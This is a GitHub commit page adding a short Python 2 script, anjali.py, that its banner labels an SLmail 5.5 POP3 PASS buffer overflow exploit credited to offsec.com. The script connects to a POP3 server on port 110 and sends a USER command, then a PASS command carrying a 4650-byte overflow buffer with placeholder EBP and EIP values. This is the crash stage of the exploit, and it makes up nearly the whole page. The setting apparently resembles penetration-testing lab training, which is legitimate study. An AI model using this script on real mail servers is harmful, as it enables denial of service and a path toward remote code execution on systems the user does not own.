Skip to content

Commit ebb64ab

Browse files
Added the anjali.py
1 parent ccae656 commit ebb64ab

1 file changed

Lines changed: 32 additions & 0 deletions

File tree

anjali.py

Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
#https://www.facebook.com/anjali.prakash3/posts/3340427346034753
2+
# Subscribed by Code House
3+
import struct
4+
import socket
5+
6+
print "\n\n###############################################"
7+
print "\nSLmail 5.5 POP3 PASS Buffer Overflow"
8+
print "\nFound & coded by muts [at] offsec.com"
9+
print "\nFor Exploitation Purposes Only!"
10+
print "\n\n###############################################"
11+
12+
13+
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
14+
15+
buffer = '\x41' * 4650
16+
ebp = "ABCD" #41424344
17+
eip = "DEAB" #44454142
18+
stack = buffer + ebp + eip
19+
20+
try:
21+
print "\nSending evil buffer..."
22+
s.connect(('192.168.195.132',110))
23+
data = s.recv(1024)
24+
s.send('USER username' +'\r\n')
25+
data = s.recv(1024)
26+
s.send('PASS ' + stack + '\r\n')
27+
data = s.recv(1024)
28+
s.close()
29+
print "\nDone! Try connecting to port on victim machine."
30+
except:
31+
print "Could not connect to POP3!"
32+

0 commit comments

Comments
 (0)